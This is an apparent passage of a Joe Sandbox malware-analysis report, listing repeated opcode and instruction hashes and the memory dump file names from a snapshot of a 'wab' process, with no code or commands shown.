                      • Instruction ID: 8f947bce7f3e7d595e550011a07b2d19fa9b3eb67ce1691562e33556af975676
                      • Opcode Fuzzy Hash: 3623883a6239ed99eefb230a98f5fddb5ceff842cb92da0a4a2a2b37eebaf5fb
                      • Instruction Fuzzy Hash: B490043131540403D100715C554C70710D55FD0305FD7D415F043D55CDD757CD517135
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 59e7f8dcd0daa81f6ab25680b349d4bf498a5b12fc6b150f570607c78bc32591
                      • Instruction ID: c135bb2169b962d6600ff3754202fb84f98889fd14970ff88a0bbae01684af2c
                      • Opcode Fuzzy Hash: 59e7f8dcd0daa81f6ab25680b349d4bf498a5b12fc6b150f570607c78bc32591
                      • Instruction Fuzzy Hash: AA90023521540402D5107158584464610D65BD0305F96D415A0429558D8654C9A1A125
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c6ccdf6c031df66ebcd17acb49141cd474dd00bb748333e1e1a799f66166410a
                      • Instruction ID: 2cebf89be579da91d6c5a552df78b355250b38564060ad5deee1e1cd92510e3d
                      • Opcode Fuzzy Hash: c6ccdf6c031df66ebcd17acb49141cd474dd00bb748333e1e1a799f66166410a
                      • Instruction Fuzzy Hash: 5A90023161940402D1407158545870610A55BD0205F96D015A0029554DC659CB5566A5
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 12b238ef4494916b58c7a2e68ee3f88f57de6e08a1479dd6441002089aa309f7
                      • Instruction ID: a450a5565f3bbc74014060a7bc03ca278ad6f5bbaa93f1f4aa2d8fda38361146
                      • Opcode Fuzzy Hash: 12b238ef4494916b58c7a2e68ee3f88f57de6e08a1479dd6441002089aa309f7
                      • Instruction Fuzzy Hash: D3900231619800129140715848C454650956BE0305B96C015E0429554C8A14CA565365
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 225798065a0a0af0e95d6210b0ea712d15577f6e1731e90b19dbad578306aeb1
                      • Instruction ID: 0b0a4edb2f35ff830168a21e3748f625f48dbcc0616dd903e348b3566f5ece89
                      • Opcode Fuzzy Hash: 225798065a0a0af0e95d6210b0ea712d15577f6e1731e90b19dbad578306aeb1
                      • Instruction Fuzzy Hash: 33900435335400030105F55C074450710D75FD53553D7C035F101F550CD731CD715135
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 797bdba934966539827df510bb9d2de9e3856019c456c267d4250e8068264483
                      • Instruction ID: f82c33fc1d648a028847aa910d60b0620f279093d301ccf36a4e3196afbb0312
                      • Opcode Fuzzy Hash: 797bdba934966539827df510bb9d2de9e3856019c456c267d4250e8068264483
                      • Instruction Fuzzy Hash: 43900231256441525545B158444450750966BE02457D6C016A1419950C8526D956D625
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2a216b9182b12f620b4f93db73ba7c7ff86bb7543d59c9edfc7bfebec951fd2c
                      • Instruction ID: 5d08e7fe90295fd6af159cbdf51c5ebb062456a3097849361db3da45f48852be
                      • Opcode Fuzzy Hash: 2a216b9182b12f620b4f93db73ba7c7ff86bb7543d59c9edfc7bfebec951fd2c
                      • Instruction Fuzzy Hash: CD9002716155004241407158484440670956BE13053D6C119A0559560C8618C955926D
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2427978220.0000000024A10000.00000040.00001000.00020000.00000000.sdmp, Offset: 24A10000, based on PE: true
                      • Associated: 0000000A.00000002.2427978220.0000000024B39000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024B3D000.00000040.00001000.00020000.00000000.sdmp
                      • Associated: 0000000A.00000002.2427978220.0000000024BAE000.00000040.00001000.00020000.00000000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_24a10000_wab.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                      • Instruction ID: c3d9aa221953d091c38835bc86f040f9f4a3f11c5d8827b9111ea5b8d25530b9
                      • Opcode Fuzzy Hash: c302c58efd76b85a4ce481e756adcff9e2826d97265cee25fad13d595f16b223
                      • Instruction Fuzzy Hash: